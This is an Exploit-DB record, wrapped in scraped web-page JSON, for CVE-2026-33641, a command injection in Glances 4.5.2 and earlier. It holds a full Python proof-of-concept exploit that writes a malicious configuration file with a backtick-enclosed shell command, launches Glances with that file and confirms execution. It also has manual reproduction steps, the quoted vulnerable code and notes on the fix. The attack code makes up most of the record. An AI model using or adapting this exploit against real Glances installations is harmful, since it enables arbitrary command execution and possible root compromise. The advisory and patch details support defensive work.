{“lastseen”:”2026-05-13T13:44:39″,”description”:”!\/usr\/bin\/env python3 Exploit Title: glances 4.5.2 – command injection Date: 2026-04-09 Exploit Author: Stepanov Daniil Vendor Homepage: https:\/\/github.com\/nicolargo\/glances Software Link: https:\/\/github.com\/nicolargo\/glances Version: 4.5.2 and below…”,”published”:”2026-05-13T00:00:00″,”modified”:”2026-05-13T00:00:00″,”type”:”exploitdb”,”title”:”glances 4.5.2 – command injection”,”source”:””,”references”:””,”id”:”EDB-ID:52559″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-33641″],”sourceData”:”#!\/usr\/bin\/env python3\\r\\n# Exploit Title: glances 4.5.2 – command injection\\r\\n# Date: 2026-04-09\\r\\n# Exploit Author: Stepanov Daniil\\r\\n# Vendor Homepage: https:\/\/github.com\/nicolargo\/glances\\r\\n# Software Link: https:\/\/github.com\/nicolargo\/glances\\r\\n# Version: 4.5.2 and below (fixed in 4.5.3)\\r\\n# Tested on: Kali Linux 2026.1, Ubuntu 22.04\\r\\n# CVE: CVE-2026-33641\\r\\n# CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)\\r\\n\\r\\n”’\\r\\nVulnerability Description:\\r\\n————————–\\r\\nGlances versions prior to 4.5.3 support dynamic configuration values in which \\r\\nsubstrings enclosed in backticks are executed as system commands during \\r\\nconfiguration parsing. This behavior occurs in Config.get_value() and is \\r\\nimplemented without validation or restriction of the executed commands.\\r\\n\\r\\nIf an attacker can modify or influence configuration files, arbitrary commands \\r\\nwill execute automatically with the privileges of the Glances process during \\r\\nstartup or configuration reload. In deployments where Glances runs with \\r\\nelevated privileges (e.g., as a system service), this may lead to privilege \\r\\nescalation.\\r\\n\\r\\nCVSS Score: 7.8 (HIGH) – CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H\\r\\n\\r\\nAffected component: glances\/config.py and glances\/globals.py\\r\\n\\r\\nCredit: Discovered by Stepanov Daniil\\r\\n”’\\r\\n\\r\\nimport subprocess\\r\\nimport os\\r\\nimport sys\\r\\nimport tempfile\\r\\n\\r\\ndef create_malicious_config(command):\\r\\n \\”\\”\\”\\r\\n Create a malicious Glances configuration file that executes arbitrary commands.\\r\\n \\r\\n The vulnerable Config.get_value() method scans for substrings enclosed in \\r\\n backticks and executes them via system_exec(), which uses subprocess.run()\\r\\n with shell=False but the backticks are extracted and executed.\\r\\n \\r\\n Vulnerable code in glances\/config.py:\\r\\n ————————————————–\\r\\n match = self.re_pattern.findall(ret)\\r\\n for m in match:\\r\\n ret = ret.replace(m, system_exec(m[1:-1]))\\r\\n ————————————————–\\r\\n \\r\\n Vulnerable code in glances\/globals.py:\\r\\n ————————————————–\\r\\n def system_exec(command, timeout=5):\\r\\n res = subprocess.run(command.split(‘ ‘), stdout=subprocess.PIPE,\\r\\n timeout=timeout).stdout.decode(‘utf-8′)\\r\\n return res\\r\\n ————————————————–\\r\\n \\”\\”\\”\\r\\n \\r\\n config_content = f\\”\\”\\”\\r\\n[outputs]\\r\\nurl_prefix = `{command}`\\r\\n\\”\\”\\”\\r\\n \\r\\n # Create temporary configuration file\\r\\n config_file = tempfile.NamedTemporaryFile(mode=’w’, suffix=’.conf’, delete=False)\\r\\n config_file.write(config_content)\\r\\n config_file.close()\\r\\n \\r\\n return config_file.name\\r\\n\\r\\ndef exploit():\\r\\n \\”\\”\\”\\r\\n Proof of Concept: Execute arbitrary commands via Glances configuration.\\r\\n \\”\\”\\”\\r\\n \\r\\n print(\\”[+] CVE-2026-33641 – Glances Command Injection PoC\\”)\\r\\n print(\\”[+] Exploit Author: Stepanov Daniil\\”)\\r\\n print()\\r\\n \\r\\n # Command to execute (create a file in \/tmp as proof)\\r\\n test_file = \\”\/tmp\/glances_pwned\\”\\r\\n command = f\\”touch {test_file}\\”\\r\\n \\r\\n print(f\\”[+] Creating malicious config with command: {command}\\”)\\r\\n config_path = create_malicious_config(command)\\r\\n print(f\\”[+] Config file created: {config_path}\\”)\\r\\n \\r\\n print(f\\”[+] Launching Glances with malicious config…\\”)\\r\\n print(\\”[+] If vulnerable, the command will execute during config parsing\\”)\\r\\n print()\\r\\n \\r\\n # Execute Glances with the malicious config\\r\\n # Note: Glances must be installed in the environment\\r\\n try:\\r\\n result = subprocess.run(\\r\\n [\\”glances\\”, \\”-C\\”, config_path, \\”–timeout\\”, \\”2\\”],\\r\\n capture_output=True,\\r\\n text=True,\\r\\n timeout=5\\r\\n )\\r\\n except FileNotFoundError:\\r\\n print(\\”[!] Error: Glances is not installed or not in PATH\\”)\\r\\n print(\\”[!] Install with: pip install glances==4.5.2\\”)\\r\\n sys.exit(1)\\r\\n except subprocess.TimeoutExpired:\\r\\n pass # Glances may run indefinitely, that’s fine\\r\\n \\r\\n # Check if the command was executed\\r\\n print(\\”[+] Checking if command was executed…\\”)\\r\\n if os.path.exists(test_file):\\r\\n print(f\\”[\u2713] SUCCESS! File created: {test_file}\\”)\\r\\n print(\\”[\u2713] Command injection confirmed!\\”)\\r\\n print(\\”[!] Vulnerability exists in this version of Glances\\”)\\r\\n os.remove(test_file)\\r\\n else:\\r\\n print(\\”[\u2717] File not found. Either the vulnerability is patched\\”)\\r\\n print(\\” or the command could not be executed.\\”)\\r\\n \\r\\n # Cleanup\\r\\n os.unlink(config_path)\\r\\n print(f\\”\\\\n[+] Cleanup complete: {config_path} removed\\”)\\r\\n \\r\\n print(\\”\\\\n[+] For more information, visit:\\”)\\r\\n print(\\” https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-33641\\”)\\r\\n\\r\\ndef manual_verification_guide():\\r\\n \\”\\”\\”\\r\\n Alternative manual verification method if Glances is not in PATH.\\r\\n \\”\\”\\”\\r\\n print(\\”\\\\n\\” + \\”=\\”*60)\\r\\n print(\\”MANUAL VERIFICATION GUIDE\\”)\\r\\n print(\\”=\\”*60)\\r\\n print(\\”\\”\\”\\r\\nIf Glances is not installed, you can verify the vulnerability by:\\r\\n1. Create a file \/tmp\/malicious.conf with:\\r\\n [outputs]\\r\\n url_prefix = `touch \/tmp\/glances_pwned`\\r\\n\\r\\n2. Run: glances -C \/tmp\/malicious.conf\\r\\n\\r\\n3. Check if \/tmp\/glances_pwned exists\\r\\n\\”\\”\\”)\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n exploit()\\r\\n manual_verification_guide()\\r\\n\\r\\n# Additional notes for Exploit-DB:\\r\\n# ———————————\\r\\n# Impact:\\r\\n# – Arbitrary command execution with privileges of Glances process\\r\\n# – Often Glances runs with elevated privileges (root\/sudo)\\r\\n# – Can lead to complete system compromise\\r\\n#\\r\\n# Fix:\\r\\n# – Upgrade to Glances version 4.5.3 or higher\\r\\n# – The dynamic backtick execution feature was completely removed\\r\\n#\\r\\n# References:\\r\\n# – https:\/\/github.com\/nicolargo\/glances\/security\/advisories\/GHSA-qhj7-v7h7-q4c7\\r\\n# – https:\/\/github.com\/nicolargo\/glances\/releases\/tag\/v4.5.3″,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52559″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52559″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-13T13:44:39″,”description”:”!\/usr\/bin\/env python3 Exploit Title: glances 4.5.2 – command injection Date: 2026-04-09 Exploit Author: Stepanov Daniil Vendor Homepage: https:\/\/github.com\/nicolargo\/glances Software Link: https:\/\/github.com\/nicolargo\/glances Version: 4.5.2 and below…”,”published”:”2026-05-13T00:00:00″,”modified”:”2026-05-13T00:00:00″,”type”:”exploitdb”,”title”:”glances…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-54039","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n